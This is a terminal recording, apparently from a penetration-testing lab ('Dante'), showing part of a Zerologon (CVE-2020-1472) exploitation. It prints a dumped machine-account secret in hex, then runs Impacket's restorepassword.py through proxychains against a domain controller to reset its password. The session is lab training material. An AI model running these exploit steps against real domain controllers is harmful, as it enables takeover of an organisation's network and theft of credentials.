[190.943169, "o", " 0050   30 97 16 13 C4 39 22 85  84 E2 CD F5 C3 CB 3E A3   0....9\".......>.\r\n 0060   33 F0 19 A0 E0 C3 14 E4  4A B5 08 B2 EF CC D1 E6   3.......J.......\r\n 0070   0C D0 71 E5 04 71 42 96  E5 5C 67 A2 16 40 7F 9C   ..q..qB..\\g..@..\r\n"]
[190.943196, "o", " 0080   5A 1E 67 7F A8 D2 EE E8  67 84 31 4D A6 08 76 D4   Z.g.....g.1M..v.\r\n 0090   A7 B7 AC 91 91 94 F1 FA  88 62 F8 9F 4D 56 DD F7   .........b..MV..\r\n"]
[190.943224, "o", " 00a0   FA AB CF 03 F1 75 76 79  55 CE 6C C6 75 F8 EB 6C   .....uvyU.l.u..l\r\n 00b0   C9 A3 E4 79 67 10 26 30  9D 04 F6 D0 64 61 F5 43   ...yg.&0....da.C\r\n"]
[190.94324, "o", " 00c0   7E 54 C0 30 B3 73 78 91  57 06 35 1A 5E 58 19 3F   ~T.0.sx.W.5.^X.?\r\n 00d0   8F 5E 55 6B 42 06 00 05  44 18 CC 00 CD 7F EB 2C   .^UkB...D......,\r\n"]
[190.943248, "o", " 00e0   B7 1C F5 39 CF DD 0F 57  74 A6 A3 4A 05 D8 E4 A3   ...9...Wt..J....\r\n_SC_{262E99C9-6160-4871-ACEC-4E61736B6F21}_MediaAdmin$:8a197a0c50a50f8ead2438e0a42d2e4c42178777d57e34b9b0a37caba7122f15be4a8c5cad90ea3a666eb3dcb7b17c8973e7a25eebea17d238acc4756d0dfaa2756bb12371845976e4f1ea018825bf6130971613c439228584e2cdf5c3cb3ea333f019a0e0c314e44ab508b2efccd1e60cd071e504714296e55c67a216407f9c5a1e677fa8d2eee86784314da60876d4a7b7ac919194f1fa8862f89f4d56ddf7faabcf03f175767955ce6cc675f8eb6cc9a3e479671026309d04f6d06461f5437e54c030b37378915706351a5e58193f8f5e556b420600054418cc00cd7feb2cb71cf539cfdd0f5774a6a34a05d8e4a3\r\n"]
[190.943314, "o", "[*] Cleaning up... \r\n"]
[190.967637, "o", "                                                                                                     \r\r"]
[190.967699, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[190.995638, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[190.995759, "o", "\u001b[?1h\u001b="]
[190.996152, "o", "\u001b[?2004h"]
[203.913788, "o", "\u001b[7m\u001b[36mproxychains4\u001b[39m\u001b[7m python3 \u001b[1m\u001b[7mrestorepassword.py\u001b[0m DANTE.local/DANTE-DC01@DANTE-DC01 \u001b[7m\u001b[32m-target-ip\u001b[39m\u001b[7m 172.16.1.20 \u001b[7m\u001b[32m-\u001b[7m\u001b[32mhexpass\u001b[27m\u001b[39m\u001b[K"]
[203.914683, "o", "\u001b[38;2;153;153;153m  729b7531c42a7287cc439da7ac8469becc39653cda954cc0f00bf02f2e7aa785dcaa10bfd2aefefe4fd7e99d7b9\u001b[38;2;153;153;153md\u001b[38;2;153;153;153md6e1832ca886a21d5f3ff292333ebb2c51e436a67c2eda18e75a51a974b3706a571bb87a8dba6d15b5eceb59f43b1016bed3\u001b[38;2;153;153;153m7\u001b[38;2;153;153;153m2121e5975d8c70e25e1c1f3b709325a21a82ddf3f42e6bb11f0ce5a62424ca58237907e5ed686ed85b6e2a10907b8428f861\u001b[38;2;153;153;153m6\u001b[38;2;153;153;153mcfa990b2e31935cfea94df807ebed8a061bb790b83f31549ae49d75a20a8be30308c974438e673a05202ea8ad562be5ca31d\u001b[38;2;153;153;153m4\u001b[38;2;153;153;153m90609b1f4e69d7ddc25935226ef16d60b9f0bd1df5600fa6a582203c13f3ec05c72e8828af8d41964bb3f\u001b[39m\u001b[K\u001b[4A\u001b[78D"]
[205.206143, "o", "\u001b[A\b\b\b\b\u001b[27m\u001b[36mp\u001b[27m\u001b[36mr\u001b[27m\u001b[36mo\u001b[27m\u001b[36mx\u001b[27m\u001b[36my\u001b[27m\u001b[36mc\u001b[27m\u001b[36mh\u001b[27m\u001b[36ma\u001b[27m\u001b[36mi\u001b[27m\u001b[36mn\u001b[27m\u001b[36ms\u001b[27m\u001b[36m4\u001b[39m\u001b[27m \u001b[27mp\u001b[27my\u001b[27mt\u001b[27mh\u001b[27mo\u001b[27mn\u001b[27m3\u001b[27m \u001b[27m\u001b[1mr\u001b[27m\u001b[1me\u001b[27m\u001b[1ms\u001b[27m\u001b[1mt\u001b[27m\u001b[1mo\u001b[27m\u001b[1mr\u001b[27m\u001b[1me\u001b[27m\u001b[1mp\u001b[27m\u001b[1ma\u001b[27m\u001b[1ms\u001b[27m\u001b[1ms\u001b[27m\u001b[1mw\u001b[27m\u001b[1mo\u001b[27m\u001b[1mr\u001b[27m\u001b[1md\u001b[27m\u001b[1m.\u001b[27m\u001b[1mp\u001b[27m\u001b[1my\u001b[0m\u001b[27m \u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m.\u001b[27ml\u001b[27mo\u001b[27mc\u001b[27ma\u001b[27ml\u001b[27m/\u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m-\u001b[27mD\u001b[27mC\u001b[27m0\u001b[27m1\u001b[27m@\u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m-\u001b[27mD\u001b[27mC\u001b[27m0\u001b[27m1\u001b[27m \u001b[27m\u001b[32m-\u001b[27m\u001b[32mt\u001b[27m\u001b[32ma\u001b[27m\u001b[32mr\u001b[27m\u001b[32mg\u001b[27m\u001b[32me\u001b[27m\u001b[32mt\u001b[27m\u001b[32m-\u001b[27m\u001b[32mi\u001b[27m\u001b[32mp\u001b[39m\u001b[27m \u001b[27m1\u001b[27m7\u001b[27m2\u001b[27m.\u001b[27m1\u001b[27m6\u001b[27m.\u001b[27m1\u001b[27m.\u001b[27m2\u001b[27m0\u001b[27m \u001b[32m-\u001b[27m\u001b[32mh\u001b[27m\u001b[32me\u001b[27m\u001b[32mx\u001b[27m\u001b[32mp\u001b[27m\u001b[32ma\u001b[27m\u001b[32ms\u001b[27m\u001b[32ms\u001b[39m\u001b[39m "]
[212.002292, "o", "\u001b[39m\u001b[7m7\u001b[39m\u001b[7m2\u001b[39m\u001b[7m9\u001b[39m\u001b[7mb\u001b[39m\u001b[7m7\u001b[39m\u001b[7m5\u001b[39m\u001b[7m3\u001b[39m\u001b[7m1\u001b[39m\u001b[7mc\u001b[39m\u001b[7m4\u001b[39m\u001b[7m2\u001b[39m\u001b[7ma\u001b[39m\u001b[7m7\u001b[39m\u001b[7m2\u001b[39m\u001b[7m8\u001b[39m\u001b[7m7\u001b[39m\u001b[7mc\u001b[39m\u001b[7mc\u001b[39m\u001b[7m4\u001b[39m\u001b[7m3\u001b[39m\u001b[7m9\u001b[39m\u001b[7md\u001b[39m\u001b[7ma\u001b[39m\u001b[7m7\u001b[39m\u001b[7ma\u001b[39m\u001b[7mc\u001b[39m\u001b[7m8\u001b[39m\u001b[7m4\u001b[39m\u001b[7m6\u001b[39m\u001b[7m9\u001b[39m\u001b[7mb\u001b[39m\u001b[7me\u001b[39m\u001b[7mc\u001b[39m\u001b[7mc\u001b[39m\u001b[7m3\u001b[39m\u001b[7m9\u001b[39m\u001b[7m6\u001b[39m\u001b[7m5\u001b[39m\u001b[7m3\u001b[39m\u001b[7mc\u001b[39m\u001b[7md\u001b[39m\u001b[7ma\u001b[39m\u001b[7m9\u001b[39m\u001b[7m5\u001b[39m\u001b[7m4\u001b[39m\u001b[7mc\u001b[39m\u001b[7mc\u001b[39m\u001b[7m0\u001b[39m\u001b[7mf\u001b[39m\u001b[7m0\u001b[39m\u001b[7m0\u001b[39m\u001b[7mb\u001b[39m\u001b[7mf\u001b[39m\u001b[7m0\u001b[39m\u001b[7m2\u001b[39m\u001b[7mf\u001b[39m\u001b[7m2\u001b[39m\u001b[7me\u001b[39m\u001b[7m7\u001b[39m\u001b[7ma\u001b[39m\u001b[7ma\u001b[39m\u001b[7m7\u001b[39m\u001b[7m8\u001b[39m\u001b[7m5\u001b[39m\u001b[7md\u001b[39m\u001b[7mc\u001b[39m\u001b[7ma\u001b[39m\u001b[7ma\u001b[39m\u001b[7m1\u001b[39m\u001b[7m0\u001b[39m\u001b[7mb\u001b[39m\u001b[7mf\u001b[39m\u001b[7md\u001b[39m\u001b[7m2\u001b[39m\u001b[7ma\u001b[39m\u001b[7me\u001b[39m\u001b[7mf\u001b[39m\u001b[7me\u001b[39m\u001b[7mf\u001b[39m\u001b[7me\u001b[39m\u001b[7m4\u001b[39m\u001b[7mf\u001b[39m\u001b[7md\u001b[39m\u001b[7m7\u001b[39m\u001b[7me\u001b[39m\u001b[7m9\u001b[39m\u001b[7m9\u001b[39m\u001b[7md\u001b[39m\u001b[7m7\u001b[39m\u001b[7mb\u001b[39m\u001b[7m9\u001b[39m\u001b[7md\u001b[7md\u001b[39m\u001b[7m6\u001b[39m\u001b[7me\u001b[39m\u001b[7m1\u001b[39m\u001b[7m8\u001b[39m\u001b[7m3\u001b[39m\u001b[7m2\u001b[39m\u001b[7mc\u001b[39m\u001b[7ma\u001b[39m\u001b[7m8\u001b[39m\u001b[7m8\u001b[39m\u001b[7m6\u001b[39m\u001b[7ma\u001b[39m\u001b[7m2\u001b[39m\u001b[7m1\u001b[39m\u001b[7md\u001b[39m\u001b[7m5\u001b[39m\u001b[7mf\u001b[39m\u001b[7m3\u001b[39m\u001b[7mf\u001b[39m\u001b[7mf\u001b[39m\u001b[7m2\u001b[39m\u001b[7m9\u001b[39m\u001b[7m2\u001b[39m\u001b[7m3\u001b[39m\u001b[7m3\u001b[39m\u001b[7m3\u001b[39m\u001b[7me\u001b[39m\u001b[7mb\u001b[39m\u001b[7mb\u001b[39m\u001b[7m2\u001b[39m\u001b[7mc\u001b[39m\u001b[7m5\u001b[39m\u001b[7m1\u001b[39m\u001b[7me\u001b[39m\u001b[7m4\u001b[39m\u001b[7m3\u001b[39m\u001b[7m6\u001b[39m\u001b[7ma\u001b[39m\u001b[7m6\u001b[39m\u001b[7m7\u001b[39m\u001b[7mc\u001b[39m\u001b[7m2\u001b[39m\u001b[7me\u001b[39m\u001b[7md\u001b[39m\u001b[7ma\u001b[39m\u001b[7m1\u001b[39m\u001b[7m8\u001b[39m\u001b[7me\u001b[39m\u001b[7m7\u001b[39m\u001b[7m5\u001b[39m\u001b[7ma\u001b[39m\u001b[7m5\u001b[39m\u001b[7m1\u001b[39m\u001b[7ma\u001b[39m\u001b[7m9\u001b[39m\u001b[7m7\u001b[39m\u001b[7m4\u001b[39m\u001b[7mb\u001b[39m\u001b[7m3\u001b[39m\u001b[7m7\u001b[39m\u001b[7m0\u001b[39m\u001b[7m6\u001b[39m\u001b[7ma\u001b[39m\u001b[7m5\u001b[39m\u001b[7m7\u001b[39m\u001b[7m1\u001b[39m\u001b[7mb\u001b[39m\u001b[7mb\u001b[39m\u001b[7m8\u001b[39m\u001b[7m7\u001b[39m\u001b[7ma\u001b[39m\u001b[7m8\u001b[39m\u001b[7md\u001b[39m\u001b[7mb\u001b[39m\u001b[7ma\u001b[39m\u001b[7m6\u001b[39m\u001b[7md\u001b[39m\u001b[7m1\u001b[39m\u001b[7m5\u001b[39m\u001b[7mb\u001b[39m\u001b[7m5\u001b[39m\u001b[7me\u001b[39m\u001b[7mc\u001b[39m\u001b[7me\u001b[39m\u001b[7mb\u001b[39m\u001b[7m5\u001b[39m\u001b[7m9\u001b[39m\u001b[7mf\u001b[39m\u001b[7m4\u001b[39m\u001b[7m3\u001b[39m\u001b[7mb\u001b[39m\u001b[7m1\u001b[39m\u001b[7m0\u001b[39m\u001b[7m1\u001b[39m\u001b[7m6\u001b[39m\u001b[7mb\u001b[39m\u001b[7me\u001b[39m\u001b[7md\u001b[39m\u001b[7m3\u001b[39m\u001b[7m7\u001b[7m2\u001b[39m\u001b[7m1\u001b[39m\u001b[7m2\u001b[39m\u001b[7m1\u001b[39m\u001b[7me\u001b[39m\u001b[7m5\u001b[39m\u001b[7m9\u001b[39m\u001b[7m7\u001b[39m\u001b[7m5\u001b[39m\u001b[7md\u001b[39m\u001b[7m8\u001b[39m\u001b[7mc\u001b[39m\u001b[7m7\u001b[39m\u001b[7m0\u001b[39m\u001b[7me\u001b[39m\u001b[7m2\u001b[39m\u001b[7m5\u001b[39m\u001b[7me\u001b[39m\u001b[7m1\u001b[39m\u001b[7mc\u001b[39m\u001b[7m1\u001b[39m\u001b[7mf\u001b[39m\u001b[7m3\u001b[39m\u001b[7mb\u001b[39m\u001b[7m7\u001b[39m\u001b[7m0\u001b[39m\u001b[7m9\u001b[39m\u001b[7m3\u001b[39m\u001b[7m2\u001b[39m\u001b[7m5\u001b[39m\u001b[7ma\u001b[39m\u001b[7m2\u001b[39m\u001b[7m1\u001b[39m\u001b[7ma\u001b[39m\u001b[7m8\u001b[39m\u001b[7m2\u001b[39m\u001b[7md\u001b[39m\u001b[7md\u001b[39m\u001b[7mf\u001b[39m\u001b[7m3\u001b[39m\u001b[7mf\u001b[39m\u001b[7m4\u001b[39m\u001b[7m2\u001b[39m\u001b[7me\u001b[39m\u001b[7m6\u001b[39m\u001b[7mb\u001b[39m\u001b[7mb\u001b[39m\u001b[7m1\u001b[39m\u001b[7m1\u001b[39m\u001b[7mf\u001b[39m\u001b[7m0\u001b[39m\u001b[7mc\u001b[39m\u001b[7me\u001b[39m\u001b[7m5\u001b[39m\u001b[7ma\u001b[39m\u001b[7m6\u001b[39m\u001b[7m2\u001b[39m\u001b[7m4\u001b[39m\u001b[7m2\u001b[39m\u001b[7m4\u001b[39m\u001b[7mc\u001b[39m\u001b[7ma\u001b[39m\u001b[7m5\u001b[39m\u001b[7m8\u001b[39m\u001b[7m2\u001b[39m\u001b[7m3\u001b[39m\u001b[7m7\u001b[39m\u001b[7m9\u001b[39m\u001b[7m0\u001b[39m\u001b[7m7\u001b[39m\u001b[7me\u001b[39m\u001b[7m5\u001b[39m\u001b[7me\u001b[39m\u001b[7md\u001b[39m\u001b[7m6\u001b[39m\u001b[7m8\u001b[39m\u001b[7m6\u001b[39m\u001b[7me\u001b[39m\u001b[7md\u001b[39m\u001b[7m8\u001b[39m\u001b[7m5\u001b[39m\u001b[7mb\u001b[39m\u001b[7m6\u001b[39m\u001b[7me\u001b[39m\u001b[7m2\u001b[39m\u001b[7ma\u001b[39m\u001b[7m1\u001b[39m\u001b[7m0\u001b[39m\u001b[7m9\u001b[39m\u001b[7m0\u001b[39m\u001b[7m7\u001b[39m\u001b[7mb\u001b[39m\u001b[7m8\u001b[39m\u001b[7m4\u001b[39m\u001b[7m2\u001b[39m\u001b[7m8\u001b[39m\u001b[7mf\u001b[39m\u001b[7m8\u001b[39m\u001b[7m6\u001b[39m\u001b[7m1\u001b[39m\u001b[7m6\u001b[7mc\u001b[39m\u001b[7mf\u001b[39m\u001b[7ma\u001b[39m\u001b[7m9\u001b[39m\u001b[7m9\u001b[39m\u001b[7m0\u001b[39m\u001b[7mb\u001b[39m\u001b[7m2\u001b[39m\u001b[7me\u001b[39m\u001b[7m3\u001b[39m\u001b[7m1\u001b[39m\u001b[7m9\u001b[39m\u001b[7m3\u001b[39m\u001b[7m5\u001b[39m\u001b[7mc\u001b[39m\u001b[7mf\u001b[39m\u001b[7me\u001b[39m\u001b[7ma\u001b[39m\u001b[7m9\u001b[39m\u001b[7m4\u001b[39m\u001b[7md\u001b[39m\u001b[7mf\u001b[39m\u001b[7m8\u001b[39m\u001b[7m0\u001b[39m\u001b[7m7\u001b[39m\u001b[7me\u001b[39m\u001b[7mb\u001b[39m\u001b[7me\u001b[39m\u001b[7md\u001b[39m\u001b[7m8\u001b[39m\u001b[7ma\u001b[39m\u001b[7m0\u001b[39m\u001b[7m6\u001b[39m\u001b[7m1\u001b[39m\u001b[7mb\u001b[39m\u001b[7mb\u001b[39m\u001b[7m7\u001b[39m\u001b[7m9\u001b[39m\u001b[7m0\u001b[39m\u001b[7mb\u001b[39m\u001b[7m8\u001b[39m\u001b[7m3\u001b[39m\u001b[7mf\u001b[39m\u001b[7m3\u001b[39m\u001b[7m1\u001b[39m\u001b[7m5\u001b[39m\u001b[7m4\u001b[39m\u001b[7m9\u001b[39m\u001b[7ma\u001b[39m\u001b[7me\u001b[39m\u001b[7m4\u001b[39m\u001b[7m9\u001b[39m\u001b[7md\u001b[39m\u001b[7m7\u001b[39m\u001b[7m5\u001b[39m\u001b[7ma\u001b[39m\u001b[7m2\u001b[39m\u001b[7m0\u001b[39m\u001b[7ma\u001b[39m\u001b[7m8\u001b[39m\u001b[7mb\u001b[39m\u001b[7me\u001b[39m\u001b[7m3\u001b[39m\u001b[7m0\u001b[39m\u001b[7m3\u001b[39m\u001b[7m0\u001b[39m\u001b[7m8\u001b[39m\u001b[7mc\u001b[39m\u001b[7m9\u001b[39m\u001b[7m7\u001b[39m\u001b[7m4\u001b[39m\u001b[7m4\u001b[39m\u001b[7m3\u001b[39m\u001b[7m8\u001b[39m\u001b[7me\u001b[39m\u001b[7m6\u001b[39m\u001b[7m7\u001b[39m\u001b[7m3\u001b[39m\u001b[7ma\u001b[39m\u001b[7m0\u001b[39m\u001b[7m5\u001b[39m\u001b[7m2\u001b[39m\u001b[7m0\u001b[39m\u001b[7m2\u001b[39m\u001b[7me\u001b[39m\u001b[7ma\u001b[39m\u001b[7m8\u001b[39m\u001b[7ma\u001b[39m\u001b[7md\u001b[39m\u001b[7m5\u001b[39m\u001b[7m6\u001b[39m\u001b[7m2\u001b[39m\u001b[7mb\u001b[39m\u001b[7me\u001b[39m\u001b[7m5\u001b[39m\u001b[7mc\u001b[39m\u001b[7ma\u001b[39m\u001b[7m3\u001b[39m\u001b[7m1\u001b[39m\u001b[7md\u001b[39m\u001b[7m4\u001b[7m9\u001b[39m\u001b[7m0\u001b[39m\u001b[7m6\u001b[39m\u001b[7m0\u001b[39m\u001b[7m9\u001b[39m\u001b[7mb\u001b[39m\u001b[7m1\u001b[39m\u001b[7mf\u001b[39m\u001b[7m4\u001b[39m\u001b[7me\u001b[39m\u001b[7m6\u001b[39m\u001b[7m9\u001b[39m\u001b[7md\u001b[39m\u001b[7m7\u001b[39m\u001b[7md\u001b[39m\u001b[7md\u001b[39m"]
[212.002318, "o", "\u001b[7mc\u001b[39m\u001b[7m2\u001b[39m\u001b[7m5\u001b[39m\u001b[7m9\u001b[39m\u001b[7m3\u001b[39m\u001b[7m5\u001b[39m\u001b[7m2\u001b[39m\u001b[7m2\u001b[39m\u001b[7m6\u001b[39m\u001b[7me\u001b[39m\u001b[7mf\u001b[39m\u001b[7m1\u001b[39m\u001b[7m6\u001b[39m\u001b[7md\u001b[39m\u001b[7m6\u001b[39m\u001b[7m0\u001b[39m\u001b[7mb\u001b[39m\u001b[7m9\u001b[39m\u001b[7mf\u001b[39m\u001b[7m0\u001b[39m\u001b[7mb\u001b[39m\u001b[7md\u001b[39m\u001b[7m1\u001b[39m\u001b[7md\u001b[39m\u001b[7mf\u001b[39m\u001b[7m5\u001b[39m\u001b[7m6\u001b[39m\u001b[7m0\u001b[39m\u001b[7m0\u001b[39m\u001b[7mf\u001b[39m\u001b[7ma\u001b[39m\u001b[7m6\u001b[39m\u001b[7ma\u001b[39m\u001b[7m5\u001b[39m\u001b[7m8\u001b[39m\u001b[7m2\u001b[39m\u001b[7m2\u001b[39m\u001b[7m0\u001b[39m\u001b[7m3\u001b[39m\u001b[7mc\u001b[39m\u001b[7m1\u001b[39m\u001b[7m3\u001b[39m\u001b[7mf\u001b[39m\u001b[7m3\u001b[39m\u001b[7me\u001b[39m\u001b[7mc\u001b[39m\u001b[7m0\u001b[39m\u001b[7m5\u001b[39m\u001b[7mc\u001b[39m\u001b[7m7\u001b[39m\u001b[7m2\u001b[39m\u001b[7me\u001b[39m\u001b[7m8\u001b[39m\u001b[7m8\u001b[39m\u001b[7m2\u001b[39m\u001b[7m8\u001b[39m\u001b[7ma\u001b[39m\u001b[7mf\u001b[39m\u001b[7m8\u001b[39m\u001b[7md\u001b[39m\u001b[7m4\u001b[39m\u001b[7m1\u001b[39m\u001b[7m9\u001b[39m\u001b[7m6\u001b[39m\u001b[7m4\u001b[39m\u001b[7mb\u001b[39m\u001b[7mb\u001b[39m\u001b[7m3\u001b[39m\u001b[7mf\u001b[27m\u001b[39m \b"]
[213.376587, "o", "\u001b[4A\u001b[76D\u001b[27m7\u001b[27m2\u001b[27m9\u001b[27mb\u001b[27m7\u001b[27m5\u001b[27m3\u001b[27m1\u001b[27mc\u001b[27m4\u001b[27m2\u001b[27ma\u001b[27m7\u001b[27m2\u001b[27m8\u001b[27m7\u001b[27mc\u001b[27mc\u001b[27m4\u001b[27m3\u001b[27m9\u001b[27md\u001b[27ma\u001b[27m7\u001b[27ma\u001b[27mc\u001b[27m8\u001b[27m4\u001b[27m6\u001b[27m9\u001b[27mb\u001b[27me\u001b[27mc\u001b[27mc\u001b[27m3\u001b[27m9\u001b[27m6\u001b[27m5\u001b[27m3\u001b[27mc\u001b[27md\u001b[27ma\u001b[27m9\u001b[27m5\u001b[27m4\u001b[27mc\u001b[27mc\u001b[27m0\u001b[27mf\u001b[27m0\u001b[27m0\u001b[27mb\u001b[27mf\u001b[27m0\u001b[27m2\u001b[27mf\u001b[27m2\u001b[27me\u001b[27m7\u001b[27ma\u001b[27ma\u001b[27m7\u001b[27m8\u001b[27m5\u001b[27md\u001b[27mc\u001b[27ma\u001b[27ma\u001b[27m1\u001b[27m0\u001b[27mb\u001b[27mf\u001b[27md\u001b[27m2\u001b[27ma\u001b[27me\u001b[27mf\u001b[27me\u001b[27mf\u001b[27me\u001b[27m4\u001b[27mf\u001b[27md\u001b[27m7\u001b[27me\u001b[27m9\u001b[27m9\u001b[27md\u001b[27m7\u001b[27mb\u001b[27m9\u001b[27mdd\u001b[27m6\u001b[27me\u001b[27m1\u001b[27m8\u001b[27m3\u001b[27m2\u001b[27mc\u001b[27ma\u001b[27m8\u001b[27m8\u001b[27m6\u001b[27ma\u001b[27m2\u001b[27m1\u001b[27md\u001b[27m5\u001b[27mf\u001b[27m3\u001b[27mf\u001b[27mf\u001b[27m2\u001b[27m9\u001b[27m2\u001b[27m3\u001b[27m3\u001b[27m3\u001b[27me\u001b[27mb\u001b[27mb\u001b[27m2\u001b[27mc\u001b[27m5\u001b[27m1\u001b[27me\u001b[27m4\u001b[27m3\u001b[27m6\u001b[27ma\u001b[27m6\u001b[27m7\u001b[27mc\u001b[27m2\u001b[27me\u001b[27md\u001b[27ma\u001b[27m1\u001b[27m8\u001b[27me\u001b[27m7\u001b[27m5\u001b[27ma\u001b[27m5\u001b[27m1\u001b[27ma\u001b[27m9\u001b[27m7\u001b[27m4\u001b[27mb\u001b[27m3\u001b[27m7\u001b[27m0\u001b[27m6\u001b[27ma\u001b[27m5\u001b[27m7\u001b[27m1\u001b[27mb\u001b[27mb\u001b[27m8\u001b[27m7\u001b[27ma\u001b[27m8\u001b[27md\u001b[27mb\u001b[27ma\u001b[27m6\u001b[27md\u001b[27m1\u001b[27m5\u001b[27mb\u001b[27m5\u001b[27me\u001b[27mc\u001b[27me\u001b[27mb\u001b[27m5\u001b[27m9\u001b[27mf\u001b[27m4\u001b[27m3\u001b[27mb\u001b[27m1\u001b[27m0\u001b[27m1\u001b[27m6\u001b[27mb\u001b[27me\u001b[27md\u001b[27m3\u001b[27m72\u001b[27m1\u001b[27m2\u001b[27m1\u001b[27me\u001b[27m5\u001b[27m9\u001b[27m7\u001b[27m5\u001b[27md\u001b[27m8\u001b[27mc\u001b[27m7\u001b[27m0\u001b[27me\u001b[27m2\u001b[27m5\u001b[27me\u001b[27m1\u001b[27mc\u001b[27m1\u001b[27mf\u001b[27m3\u001b[27mb\u001b[27m7\u001b[27m0\u001b[27m9\u001b[27m3\u001b[27m2\u001b[27m5\u001b[27ma\u001b[27m2\u001b[27m1\u001b[27ma\u001b[27m8\u001b[27m2\u001b[27md\u001b[27md\u001b[27mf\u001b[27m3\u001b[27mf\u001b[27m4\u001b[27m2\u001b[27me\u001b[27m6\u001b[27mb\u001b[27mb\u001b[27m1\u001b[27m1\u001b[27mf\u001b[27m0\u001b[27mc\u001b[27me\u001b[27m5\u001b[27ma\u001b[27m6\u001b[27m2\u001b[27m4\u001b[27m2\u001b[27m4\u001b[27mc\u001b[27ma\u001b[27m5\u001b[27m8\u001b[27m2\u001b[27m3\u001b[27m7\u001b[27m9\u001b[27m0\u001b[27m7\u001b[27me\u001b[27m5\u001b[27me\u001b[27md\u001b[27m6\u001b[27m8\u001b[27m6\u001b[27me\u001b[27md\u001b[27m8\u001b[27m5\u001b[27mb\u001b[27m6\u001b[27me\u001b[27m2\u001b[27ma\u001b[27m1\u001b[27m0\u001b[27m9\u001b[27m0\u001b[27m7\u001b[27mb\u001b[27m8\u001b[27m4\u001b[27m2\u001b[27m8\u001b[27mf\u001b[27m8\u001b[27m6\u001b[27m1\u001b[27m6c\u001b[27mf\u001b[27ma\u001b[27m9\u001b[27m9\u001b[27m0\u001b[27mb\u001b[27m2\u001b[27me\u001b[27m3\u001b[27m1\u001b[27m9\u001b[27m3\u001b[27m5\u001b[27mc\u001b[27mf\u001b[27me\u001b[27ma\u001b[27m9\u001b[27m4\u001b[27md\u001b[27mf\u001b[27m8\u001b[27m0\u001b[27m7\u001b[27me\u001b[27mb\u001b[27me\u001b[27md\u001b[27m8\u001b[27ma\u001b[27m0\u001b[27m6\u001b[27m1\u001b[27mb\u001b[27mb\u001b[27m7\u001b[27m9\u001b[27m0\u001b[27mb\u001b[27m8\u001b[27m3\u001b[27mf\u001b[27m3\u001b[27m1\u001b[27m5\u001b[27m4\u001b[27m9\u001b[27ma\u001b[27me\u001b[27m4\u001b[27m9\u001b[27md\u001b[27m7\u001b[27m5\u001b[27ma\u001b[27m2\u001b[27m0\u001b[27ma\u001b[27m8\u001b[27mb\u001b[27me\u001b[27m3\u001b[27m0\u001b[27m3\u001b[27m0\u001b[27m8\u001b[27mc\u001b[27m9\u001b[27m7\u001b[27m4\u001b[27m4\u001b[27m3\u001b[27m8\u001b[27me\u001b[27m6\u001b[27m7\u001b[27m3\u001b[27ma\u001b[27m0\u001b[27m5\u001b[27m2\u001b[27m0\u001b[27m2\u001b[27me\u001b[27ma\u001b[27m8\u001b[27ma\u001b[27md\u001b[27m5\u001b[27m6\u001b[27m2\u001b[27mb\u001b[27me\u001b[27m5\u001b[27mc\u001b[27ma\u001b[27m3\u001b[27m1\u001b[27md\u001b[27m49\u001b[27m0\u001b[27m6\u001b[27m0\u001b[27m9\u001b[27mb\u001b[27m1\u001b[27mf\u001b[27m4\u001b[27me\u001b[27m6\u001b[27m9\u001b[27md\u001b[27m7\u001b[27md\u001b[27md\u001b[27mc\u001b[27m2\u001b[27m5\u001b[27m9\u001b[27m3\u001b[27m5\u001b[27m2\u001b[27m2\u001b[27m6\u001b[27me\u001b[27mf\u001b[27m1\u001b[27m6\u001b[27md\u001b[27m6\u001b[27m0\u001b[27mb\u001b[27m9\u001b[27mf\u001b[27m0\u001b[27mb\u001b[27md\u001b[27m1\u001b[27md\u001b[27mf\u001b[27m5\u001b[27m6\u001b[27m0\u001b[27m0\u001b[27mf\u001b[27ma\u001b[27m6\u001b[27ma\u001b[27m5\u001b[27m8\u001b[27m2\u001b[27m2\u001b[27m0\u001b[27m3\u001b[27mc\u001b[27m1\u001b[27m3\u001b[27mf\u001b[27m3\u001b[27me\u001b[27mc\u001b[27m0\u001b[27m5\u001b[27mc\u001b[27m7\u001b[27m2\u001b[27me\u001b[27m8\u001b[27m8\u001b[27m2\u001b[27m8\u001b[27ma\u001b[27mf\u001b[27m8\u001b[27md\u001b[27m4\u001b[27m1\u001b[27m9\u001b[27m6\u001b[27m4\u001b[27mb\u001b[27mb\u001b[27m3\u001b[27mf"]
[213.376794, "o", "\u001b[?1l\u001b>"]
[213.408945, "o", "\u001b[?2004l\r\r\n"]
[213.409813, "o", "[proxychains] config file found: /etc/proxychains4.conf\r\n[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4\r\n"]
[213.410282, "o", "[proxychains] DLL init: proxychains-ng 4.17\r\n"]
[213.623362, "o", "Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation\r\n\r\n"]
[213.624538, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[213.771565, "o", " ...  172.16.1.20:135 "]
[214.348909, "o", " ...  OK\r\n"]
[215.461399, "o", "[*] StringBinding ncacn_ip_tcp:172.16.1.20[49158]\r\n"]
[215.461533, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[215.614078, "o", " ...  172.16.1.20:49158 "]
[216.191288, "o", " ...  OK\r\n"]
[217.202771, "o", "Change password OK\r\n"]
[217.231243, "o", "                                                                                                     \r\r\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[217.263076, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[217.263159, "o", "\u001b[?1h\u001b="]
